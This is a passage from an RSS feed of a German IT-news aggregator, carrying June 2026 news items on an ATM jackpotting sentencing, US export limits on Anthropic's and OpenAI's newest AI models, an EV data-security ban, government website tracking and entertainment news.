<link>https://tsecurity.de/de/3634066/it-nachrichten/large-hadron-collider-goes-offline-to-make-room-for-its-enhanced-successor/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634066/it-nachrichten/large-hadron-collider-goes-offline-to-make-room-for-its-enhanced-successor/</guid>
<pubDate>Mon, 29 Jun 2026 23:17:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The High-Luminosity LHC will be mostly the same machine, but it'll deliver 10 times the luminosity and just as little chance of destroying the universe - sorry, conspiracy theorists]]></content:encoded>
</item>
<item>
<title><![CDATA[US bans Polestar but not Volvo in baffling EV ruling — data security fears force exit for premium brand, while its sister company gets a green light]]></title>
<description><![CDATA[New US rule will ban Polestar EVs over data security fears, even though none of the EVs it sells in North America are built in China.]]></description>
<link>https://tsecurity.de/de/3633836/it-nachrichten/us-bans-polestar-but-not-volvo-in-baffling-ev-ruling-data-security-fears-force-exit-for-premium-brand-while-its-sister-company-gets-a-green-light/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633836/it-nachrichten/us-bans-polestar-but-not-volvo-in-baffling-ev-ruling-data-security-fears-force-exit-for-premium-brand-while-its-sister-company-gets-a-green-light/</guid>
<pubDate>Mon, 29 Jun 2026 21:01:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[New US rule will ban Polestar EVs over data security fears, even though none of the EVs it sells in North America are built in China.]]></content:encoded>
</item>
<item>
<title><![CDATA[ATM Jackpotting Gang Members Sentenced for Ploutus Malware Attacks]]></title>
<description><![CDATA[Two Venezuelan nationals have been sentenced to 78 months in prison for their role in an ATM jackpotting scheme that used malware to force cash machines across the United States to dispense money illegally. The operation, which authorities say was part of a broader transnational criminal network,...]]></description>
<link>https://tsecurity.de/de/3632070/it-security-nachrichten/atm-jackpotting-gang-members-sentenced-for-ploutus-malware-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632070/it-security-nachrichten/atm-jackpotting-gang-members-sentenced-for-ploutus-malware-attacks/</guid>
<pubDate>Mon, 29 Jun 2026 08:08:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/ATM-jackpotting-Malware.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="ATM jackpotting" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/ATM-jackpotting-Malware.webp 1536w, https://thecyberexpress.com/wp-content/uploads/ATM-jackpotting-Malware-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/ATM-jackpotting-Malware-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/ATM-jackpotting-Malware-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/ATM-jackpotting-Malware-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/ATM-jackpotting-Malware-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/ATM-jackpotting-Malware-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/ATM-jackpotting-Malware-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/ATM-jackpotting-Malware.webp 1536w, https://thecyberexpress.com/wp-content/uploads/ATM-jackpotting-Malware-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/ATM-jackpotting-Malware-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/ATM-jackpotting-Malware-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/ATM-jackpotting-Malware-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/ATM-jackpotting-Malware-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/ATM-jackpotting-Malware-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/ATM-jackpotting-Malware-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="ATM Jackpotting Gang Members Sentenced for Ploutus Malware Attacks 1"></p><p data-start="541" data-end="944">Two Venezuelan nationals have been sentenced to 78 months in prison for their role in an <a href="https://thecyberexpress.com/atm-jackpotting-leader-added-to-fbi-list/" target="_blank" rel="noopener">ATM jackpotting </a>scheme that used malware to force cash machines across the United States to dispense money illegally. The operation, which authorities say was part of a broader transnational criminal network, involved the deployment of <a href="https://thecyberexpress.com/fbi-flags-rise-in-atm-jackpotting-attacks/" target="_blank" rel="noopener">Ploutus malware</a> on ATMs and resulted in losses exceeding $1.5 million.</p>
<p data-start="946" data-end="1202">Carlos Javier Padron, 36, was sentenced after pleading guilty to conspiracy to commit bank burglary and computer fraud. His co-defendant, Oddry Arnoldo Cabrera Torrealba, 37, received the same sentence on June 11 after pleading guilty to identical charges.</p>

<h3 data-section-id="110a7pp" data-start="1204" data-end="1268"><strong>Ploutus Malware Used to Trigger Unauthorized Cash Withdrawals</strong></h3>
<p data-start="1270" data-end="1531"><a href="https://www.justice.gov/opa/pr/two-illegal-aliens-sentenced-international-atm-jackpotting-conspiracy-ties-tren-de-aragua" target="_blank" rel="nofollow noopener">According to court documents</a>, Padron and Torrealba were members of a criminal network responsible for carrying out ATM jackpotting attacks across the United States. Their role involved physically installing a variant of Ploutus <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-malware/" target="_blank" rel="noopener" title="malware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28843">malware</a> on targeted ATMs.</p>
<p data-start="1533" data-end="1848">Once activated, the <a href="https://thecyberexpress.com/?s=malware" target="_blank" rel="noopener">malware</a> enabled attackers to send commands directly to the ATM's cash dispensing module, allowing unauthorized withdrawals of currency. Investigators said the <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-malware/" title="malware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28848">malware</a> was also designed to erase traces of its presence, making it more difficult for financial institutions to detect the compromise.</p>
<p data-start="1850" data-end="1960">The two men were arrested by the Lincoln Police Department during an ATM jackpotting incident in October 2024.</p>

<h3 data-section-id="1lwrx" data-start="1962" data-end="2010"><strong>More Than $1.5 Million Ordered in Restitution</strong></h3>
<p data-start="2012" data-end="2161">Along with their prison sentences, Padron and Torrealba were jointly ordered to pay $1,537,696 in restitution to the affected financial institutions.</p>
<p data-start="2163" data-end="2573">Officials said the investigation uncovered a much larger criminal operation following their arrests. Authorities have since indicted 96 additional individuals connected to the conspiracy on charges including bank burglary conspiracy, money laundering, <a href="https://thecyberexpress.com/cyber-fraud-cybersecurity-in-zimbabwe/" target="_blank" rel="noopener">computer fraud</a>, unauthorized access to protected computers, bank fraud, and providing material support to a designated foreign terrorist organization.</p>

<h3 data-section-id="1m1pm6p" data-start="2575" data-end="2619"><strong>Authorities Link Scheme to Tren de Aragua</strong></h3>
<p data-start="2621" data-end="2836">U.S. officials stated that the investigation established direct and indirect links between several indicted co-conspirators and Tren de Aragua, a transnational criminal organization that originated in Venezuela.</p>
<p data-start="2838" data-end="3100">According to investigators, the group has expanded its operations throughout the Western Hemisphere and has been involved in crimes including drug trafficking, firearms trafficking, kidnapping, robbery, extortion, commercial sex trafficking, and <a href="https://thecyberexpress.com/vans-cyberattack-no-financial-info-exposed/" target="_blank" rel="noopener">financial fraud</a>.</p>
<p data-start="3102" data-end="3310">Authorities allege that ATM jackpotting became one of the organization's revenue-generating activities, targeting financial institutions across the United States through coordinated cyber-enabled attacks.</p>

<h3 data-section-id="o8tyru" data-start="3312" data-end="3376"><strong>Justice Department Says Financial Crimes Fund Organized Crime</strong></h3>
<p data-start="3378" data-end="3686">Assistant Attorney <a class="wpil_keyword_link" href="https://cyble.com/general/" target="_blank" rel="noopener" title="General" data-wpil-keyword-link="linked" data-wpil-monitor-id="28846">General</a> A. Tysen Duva said the defendants helped deploy malware as part of a <a href="https://thecyberexpress.com/socgholish-malware-hit-in-operation-endgame/" target="_blank" rel="noopener">criminal network</a> that stole millions of dollars from ATMs across the country. He added that disrupting such operations is critical to protecting financial institutions from technology-enabled <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="28847">fraud</a>.</p>
<p data-start="3688" data-end="3950">U.S. Attorney Lesley Woods for the District of Nebraska described ATM jackpotting as a significant revenue source used to finance the criminal activities attributed to the organization and said federal prosecutors would continue targeting its financial networks.</p>
<p data-start="3952" data-end="4281">The FBI's Omaha Field Office said it continues to adapt its investigative efforts as criminal organizations increasingly rely on cyber-enabled financial crimes. Homeland Security Investigations also stated that the prosecution was intended to protect both consumers and the U.S. financial system from organized criminal activity.</p>

<h3 data-section-id="1fkgy78" data-start="4283" data-end="4322"><strong>Multi-Agency Investigation Continues</strong></h3>
<p data-start="4324" data-end="4524">The investigation was led by the FBI Omaha Field Office and Homeland Security Investigations, with assistance from numerous federal, state, and local law enforcement agencies across the United States.</p>
<p data-start="4526" data-end="4718">The case is being prosecuted by the Justice Department's Computer <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="Crime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28844">Crime</a> and Intellectual Property Section, the U.S. Attorney's Office for the District of Nebraska, and Joint Task Force Vulcan.</p>
<p data-start="4720" data-end="4969" data-is-last-node="" data-is-only-node="">Officials said the case forms part of a broader federal effort targeting transnational criminal organizations involved in <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/" target="_blank" rel="noopener" title="cybercrime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28845">cybercrime</a>, financial fraud, and other organized criminal activities. The investigation into the wider network remains ongoing.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘It’s dangerous and it’s going to erode trust’: redesign of US government websites stokes surveillance fears]]></title>
<description><![CDATA[The National Design Studio, staffed by Doge veterans, installed visitor-tracking software on vital federal websitesAn opaque White House office staffed largely by veterans of Elon Musk’s “department of government efficiency” (Doge) has quietly rebuilt some of the federal government’s most sensiti...]]></description>
<link>https://tsecurity.de/de/3631850/it-nachrichten/its-dangerous-and-its-going-to-erode-trust-redesign-of-us-government-websites-stokes-surveillance-fears/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631850/it-nachrichten/its-dangerous-and-its-going-to-erode-trust-redesign-of-us-government-websites-stokes-surveillance-fears/</guid>
<pubDate>Mon, 29 Jun 2026 05:17:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The National Design Studio, staffed by Doge veterans, installed visitor-tracking software on vital federal websites</p><p>An opaque White House office staffed largely by veterans of Elon Musk’s “department of government efficiency” (Doge) has quietly rebuilt some of the federal government’s most sensitive websites – for passport applications, voter registration, prescription-drug pricing and children’s savings – in ways critics say appear to violate federal law.</p><p>The <a href="https://ndstudio.gov/">National Design Studio</a> (NDS) was established by a <a href="https://www.theguardian.com/us-news/donaldtrump">Donald Trump</a> executive order last August, and is led by <a href="https://www.theguardian.com/us-news/2025/nov/23/trump-musk-doge-reportedly-disbanded">Trump-aligned Airbnb co-founder Joe Gebbia</a> and staffed by Doge veterans.</p> <a href="https://www.theguardian.com/us-news/2026/jun/28/government-website-visitor-tracking-surveillance-fears">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Trump Administration Eases Rules on Anthropic Mythos AI Model]]></title>
<description><![CDATA[The Trump administration just changed its mind and is allowing a limited release of the powerful Mythos 5 artificial intelligence model from Anthropic. After totally blocking the software a couple of weeks ago, the government will now let over 100 trusted agencies and infrastructure companies use...]]></description>
<link>https://tsecurity.de/de/3629944/ios-mac-os/trump-administration-eases-rules-on-anthropic-mythos-ai-model/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629944/ios-mac-os/trump-administration-eases-rules-on-anthropic-mythos-ai-model/</guid>
<pubDate>Sat, 27 Jun 2026 19:39:41 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Trump administration just changed its mind and is allowing a limited release of the powerful Mythos 5 artificial intelligence model from Anthropic. After totally blocking the software a couple of weeks ago, the government will now let over 100 trusted agencies and infrastructure companies use the tool. This recent move eases the sudden ban that completely shook up the tech world earlier this month.



The government allows access for trusted security partners



Commerce Secretary Howard Lutnick shared the news in a letter to the company. He stated that the government now believes there are enough safety checks in place to let select groups use the technology. This marks a big shift from June 12, when officials completely banned the model over fears that hackers could easily get around its safety limits.



The new rules even allow non-American employees at these approved organizations to use the software. At first, the ban blocked all foreign workers from accessing the tech, which caused a lot of worry among companies building artificial intelligence tools. Now, the people defending important computer networks can use the smartest tools available to do their jobs safely.



The company tries to bring back its public software



While the smartest version is slowly coming back, the company still has a lot of work to do. The recent letter from the government did not mention anything about Fable 5, which is the version made for normal public use. People were excited when the company launched its first public model in this category recently, but it remains totally blocked.



The tech brand says it is working very hard with officials to change this. Leaders hope to expand who can use Mythos 5 and finally bring Fable 5 back for everyone else. Until then, most businesses will have to rely on older tools or switch to software made by companies like Apple and other major tech names.



Building safe AI is a huge challenge right now. The government clearly wants to keep total control over who gets to use the smartest systems before they reach the public market.]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic Restores Limited Access to Claude Mythos 5 AI Model After US Government Approval]]></title>
<description><![CDATA[  Earlier limits on Anthropic’s top-tier AI tools have been eased by U.S. officials, reopening limited availability of the Claude Mythos 5 system to certain approved American institutions. Though only recently barred due to fears about potential misuse threatening national…
Read more →
The post A...]]></description>
<link>https://tsecurity.de/de/3629941/it-security-nachrichten/anthropic-restores-limited-access-to-claude-mythos-5-ai-model-after-us-government-approval/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629941/it-security-nachrichten/anthropic-restores-limited-access-to-claude-mythos-5-ai-model-after-us-government-approval/</guid>
<pubDate>Sat, 27 Jun 2026 19:38:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  Earlier limits on Anthropic’s top-tier AI tools have been eased by U.S. officials, reopening limited availability of the Claude Mythos 5 system to certain approved American institutions. Though only recently barred due to fears about potential misuse threatening national…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/anthropic-restores-limited-access-to-claude-mythos-5-ai-model-after-us-government-approval/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/anthropic-restores-limited-access-to-claude-mythos-5-ai-model-after-us-government-approval/">Anthropic Restores Limited Access to Claude Mythos 5 AI Model After US Government Approval</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[US Government Allows Anthropic Limited Release of 'Mythos' AI Model, Saying 'Appropriate Safeguards are in Place"]]></title>
<description><![CDATA["The US government has allowed Anthropic to release its powerful Mythos AI model to select companies and organizations," reports CNN, "revising license requirements after ordering an export block earlier this month in the wake of national security fears."


Since the export ban earlier in June, "...]]></description>
<link>https://tsecurity.de/de/3628889/it-security-nachrichten/us-government-allows-anthropic-limited-release-of-mythos-ai-model-saying-appropriate-safeguards-are-in-place/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628889/it-security-nachrichten/us-government-allows-anthropic-limited-release-of-mythos-ai-model-saying-appropriate-safeguards-are-in-place/</guid>
<pubDate>Sat, 27 Jun 2026 04:37:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["The US government has allowed Anthropic to release its powerful Mythos AI model to select companies and organizations," reports CNN, "revising license requirements after ordering an export block earlier this month in the wake of national security fears."


Since the export ban earlier in June, "Anthropic has worked with the US government to address risks associated with the Covered Models," Commerce Secretary Howard Lutnick wrote to the company in a letter dated Friday. In light of progress in that work, Lutnick wrote, "I have determined that appropriate safeguards are in place to permit certain trusted partners to access the Claude Mythos 5 Model." 

The letter does not include permission for Anthropic to release Fable, a less powerful version of Mythos. "We received notice from the US government that Mythos 5, our strongest cybersecurity model, can be redeployed to a small group of cyber defenders and infrastructure providers," Anthropic said in a statement... 

Conversations between Anthropic and the government are expected to continue into the weekend, with an eye to restoring access to Fable, as well, a source familiar with the discussions told CNN.

<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=US+Government+Allows+Anthropic+Limited+Release+of+'Mythos'+AI+Model%2C+Saying+'Appropriate+Safeguards+are+in+Place%22%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F06%2F27%2F0159230%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F06%2F27%2F0159230%2Fus-government-allows-anthropic-limited-release-of-mythos-ai-model-saying-appropriate-safeguards-are-in-place%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/06/27/0159230/us-government-allows-anthropic-limited-release-of-mythos-ai-model-saying-appropriate-safeguards-are-in-place?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Quote of the day by Nvidia CEO Jensen Huang: 'People talk about AI reducing jobs — complete nonsense' — pushing back against automation fears]]></title>
<description><![CDATA[Automation has long been considered a threat to jobs and employment, but not everybody agrees – least of all those architecting the AI buildout]]></description>
<link>https://tsecurity.de/de/3628651/it-nachrichten/quote-of-the-day-by-nvidia-ceo-jensen-huang-people-talk-about-ai-reducing-jobs-complete-nonsense-pushing-back-against-automation-fears/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628651/it-nachrichten/quote-of-the-day-by-nvidia-ceo-jensen-huang-people-talk-about-ai-reducing-jobs-complete-nonsense-pushing-back-against-automation-fears/</guid>
<pubDate>Sat, 27 Jun 2026 00:03:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Automation has long been considered a threat to jobs and employment, but not everybody agrees – least of all those architecting the AI buildout]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Hits Apple TV Next Week With Three Big Plot Shifts]]></title>
<description><![CDATA[Fans of the hit dystopian series can finally mark their calendars. The wait is almost over for the next chapter of this gripping story. If you have been searching for the Silo season 3 release date and first trailer, you will be happy to know the show premieres on July 3. It is bringing some majo...]]></description>
<link>https://tsecurity.de/de/3628207/ios-mac-os/silo-season-3-hits-apple-tv-next-week-with-three-big-plot-shifts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628207/ios-mac-os/silo-season-3-hits-apple-tv-next-week-with-three-big-plot-shifts/</guid>
<pubDate>Fri, 26 Jun 2026 19:39:25 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Fans of the hit dystopian series can finally mark their calendars. The wait is almost over for the next chapter of this gripping story. If you have been searching for the Silo season 3 release date and first trailer, you will be happy to know the show premieres on July 3. It is bringing some major twists to the underground world.



The show is moving beyond the first book to weave together storylines from the rest of the trilogy. You can expect a fresh timeline, a huge shift in leadership, and plenty of new faces when it lands next week.



Quick details




Title: Silo



Genre: Sci-Fi, drama



Lead star: Rebecca Ferguson



Premiere date: July 3, 2026



Setting: Dystopian underground society




According to Apple's official description of Silo Season 3-




"Season three of “Silo” continues the saga of a dystopian society of 10,000 people living underground under mysterious circumstances, while revealing an origin story set centuries earlier. In the present, Juliette Nichols (Ferguson) survives her forced “cleaning” but returns with memory loss as the silo recovers from rebellion and faces a dangerous new threat."




The story jumps back in time to explore the surface



Instead of picking up exactly where the second book starts, the new season blends events from the second and third books by Hugh Howey. This means the show will step outside the dark walls of the silo to show us what the world looked like before the underground structures were built.



It is a big change from the familiar setting. The split timeline allows the story to dig into the origins of the silos, giving answers about how this society started. Meanwhile, the present day plot will still follow Juliette and the characters you already know from previous seasons created by Apple. It is making sure its biggest hit stays fresh by expanding the world.



New actors join the cast to play people from the past



Because a large part of the story focuses on the world before the silos, the show is bringing in a bunch of new talent. You might have seen a quick look at Jessica Henwick and Ashley Zukerman at the end of the second season. They play a journalist and a congressman who stumble onto a dangerous conspiracy.



Other fresh faces include Laura Innes, Jessica Brown Findlay, Morven Christie, Reed Birney, Matt Craven, and Colin Hanks. They will help flesh out this earlier timeline as the show expands its universe and explores the events that forced humanity underground.



Juliette takes charge as the new mayor of the silo



A teaser clip shared earlier this year confirmed a massive career change for the main character. Juliette is now the mayor of the silo. This completely changes her dynamic with the rest of the underground community.



The last time we saw Juliette, she was fighting for her life in an airlock with the previous mayor, Bernard, while flames surrounded them. It is clear she made it out of that situation alive and ended up taking his job. You can catch up on the earlier episodes on Apple TV before the new ones drop.



With a new role for Juliette, a fresh cast of characters, and a timeline that finally reveals the outside world, this season promises to answer some of the biggest questions fans have had since the beginning. It will be interesting to see how the show balances the past and present without losing the tense atmosphere that made it a hit.]]></content:encoded>
</item>
<item>
<title><![CDATA[US tells OpenAI to restrict access to its most powerful AI model]]></title>
<description><![CDATA[US authorities are getting decidedly twitchy about frontier AI models. Just a couple of weeks after ordering Anthropic to prevent foreign companies from getting hold of its latest release, Mythos/Fable 5, it’s been putting the squeeze on another AI company..



Now, the Trump administration is as...]]></description>
<link>https://tsecurity.de/de/3628034/ai-nachrichten/us-tells-openai-to-restrict-access-to-its-most-powerful-ai-model/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628034/ai-nachrichten/us-tells-openai-to-restrict-access-to-its-most-powerful-ai-model/</guid>
<pubDate>Fri, 26 Jun 2026 18:20:25 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>US authorities are getting decidedly twitchy about frontier AI models. Just a couple of weeks after <a href="https://www.cio.com/article/4185175/anthropic-locks-enterprises-out-of-fable-and-mythos-following-government-order.html">ordering Anthropic</a> to prevent foreign companies from getting hold of its latest release, Mythos/Fable 5, it’s been putting the squeeze on another AI company..</p>



<p>Now, the Trump administration is asking OpenAI to hold back on the general release of GPT-5.6, according <a href="https://www.bloomberg.com/news/articles/2026-06-25/trump-administration-asks-openai-to-stagger-release-of-ai-model" target="_blank" rel="noreferrer noopener">to a report from Bloomberg</a>.</p>



<p>OpenAI CEO Sam Altman reportedly told employees that the government is asking that the model be released only to a short list of trusted partners, initially 20, before being more widely disseminated.</p>



<p>Altman reportedly told staffers that the administration was getting nervous about the capabilities of the latest AI tools. It didn’t go as far as forbidding access to foreign users but it’s clear that the White House is looking to act as the power of the new models becomes more apparent.</p>



<p>The administration’s actions will undoubtedly cause some anxiety among AI companies, particularly in light of OpenAI’s and Anthropic’s upcoming IPOs. There will be concerns that new software developments could be postponed or even halted. However, it should also be noted that the administration was <a href="https://www.cio.com/article/4138386/anthropic-to-us-dod-no-compromise-on-ai-ethics.html">already displeased with Anthropic</a> over its moral stance on defense issues, so the action against Mythos should be placed in context.</p>



<p>Indeed, the government is trying to play down such fears. Bloomberg quoted a White House official as saying that the Trump administration continues to collaborate with frontier AI labs to develop shared approaches for addressing the challenges of scaling the technology.</p>



<p><em>This article first appeared on <a href="https://www.computerworld.com/article/4190083/us-tells-openai-to-restrict-access-to-its-most-powerful-ai-model.html">Computerworld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[US tells OpenAI to restrict access to its most powerful AI model]]></title>
<description><![CDATA[US authorities are getting decidedly twitchy about frontier AI models. Just a couple of weeks after ordering Anthropic to prevent foreign companies from getting hold of its latest release, Mythos/Fable 5, it’s been putting the squeeze on another AI company..



Now, the Trump administration is as...]]></description>
<link>https://tsecurity.de/de/3628018/it-nachrichten/us-tells-openai-to-restrict-access-to-its-most-powerful-ai-model/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628018/it-nachrichten/us-tells-openai-to-restrict-access-to-its-most-powerful-ai-model/</guid>
<pubDate>Fri, 26 Jun 2026 18:19:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>US authorities are getting decidedly twitchy about frontier AI models. Just a couple of weeks after <a href="https://www.cio.com/article/4185175/anthropic-locks-enterprises-out-of-fable-and-mythos-following-government-order.html">ordering Anthropic</a> to prevent foreign companies from getting hold of its latest release, Mythos/Fable 5, it’s been putting the squeeze on another AI company..</p>



<p>Now, the Trump administration is asking OpenAI to hold back on the general release of GPT-5.6, according <a href="https://www.bloomberg.com/news/articles/2026-06-25/trump-administration-asks-openai-to-stagger-release-of-ai-model" target="_blank" rel="noreferrer noopener">to a report from Bloomberg</a>.</p>



<p>OpenAI CEO Sam Altman reportedly told employees that the government is asking that the model be released only to a short list of trusted partners, initially 20, before being more widely disseminated.</p>



<p>Altman reportedly told staffers that the administration was getting nervous about the capabilities of the latest AI tools. It didn’t go as far as forbidding access to foreign users but it’s clear that the White House is looking to act as the power of the new models becomes more apparent.</p>



<p>The administration’s actions will undoubtedly cause some anxiety among AI companies, particularly in light of OpenAI’s and Anthropic’s upcoming IPOs. There will be concerns that new software developments could be postponed or even halted. However, it should also be noted that the administration was <a href="https://www.cio.com/article/4138386/anthropic-to-us-dod-no-compromise-on-ai-ethics.html">already displeased with Anthropic</a> over its moral stance on defense issues, so the action against Mythos should be placed in context.</p>



<p>Indeed, the government is trying to play down such fears. Bloomberg quoted a White House official as saying that the Trump administration continues to collaborate with frontier AI labs to develop shared approaches for addressing the challenges of scaling the technology.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Cyber Express Weekly Roundup: Five Eyes AI Warning, KDDI Data Breach, Garfield AI Legal Milestone, and Iranian Hacker Arrest]]></title>
<description><![CDATA[This week’s weekly roundup of cybersecurity developments highlights a rapid shift in global cyber risk conditions driven by artificial intelligence acceleration, large-scale data breaches, and expanding international enforcement actions. Across infrastructure, enterprise systems, public services,...]]></description>
<link>https://tsecurity.de/de/3626950/it-security-nachrichten/the-cyber-express-weekly-roundup-five-eyes-ai-warning-kddi-data-breach-garfield-ai-legal-milestone-and-iranian-hacker-arrest/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626950/it-security-nachrichten/the-cyber-express-weekly-roundup-five-eyes-ai-warning-kddi-data-breach-garfield-ai-legal-milestone-and-iranian-hacker-arrest/</guid>
<pubDate>Fri, 26 Jun 2026 11:53:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1225" height="766" src="https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="The Cyber Express weekly roundup June 2026" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026.webp 1225w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-300x188.webp 300w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-1024x640.webp 1024w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-768x480.webp 768w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-600x375.webp 600w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-150x94.webp 150w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-750x469.webp 750w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-1140x713.webp 1140w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026.webp 1225w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-300x188.webp 300w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-1024x640.webp 1024w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-768x480.webp 768w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-600x375.webp 600w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-150x94.webp 150w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-750x469.webp 750w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-1140x713.webp 1140w" sizes="(max-width: 1225px) 100vw, 1225px" title="The Cyber Express Weekly Roundup: Five Eyes AI Warning, KDDI Data Breach, Garfield AI Legal Milestone, and Iranian Hacker Arrest 1"></p><span data-contrast="auto">This week’s weekly roundup of cybersecurity developments highlights a rapid shift in global cyber risk conditions driven by artificial intelligence acceleration, large-scale data breaches, and expanding international enforcement actions. Across infrastructure, enterprise systems, public services, and regulated AI applications, organizations are increasingly exposed to faster-moving threats where traditional security assumptions are being challenged by automation and long-term intrusion campaigns.</span><span 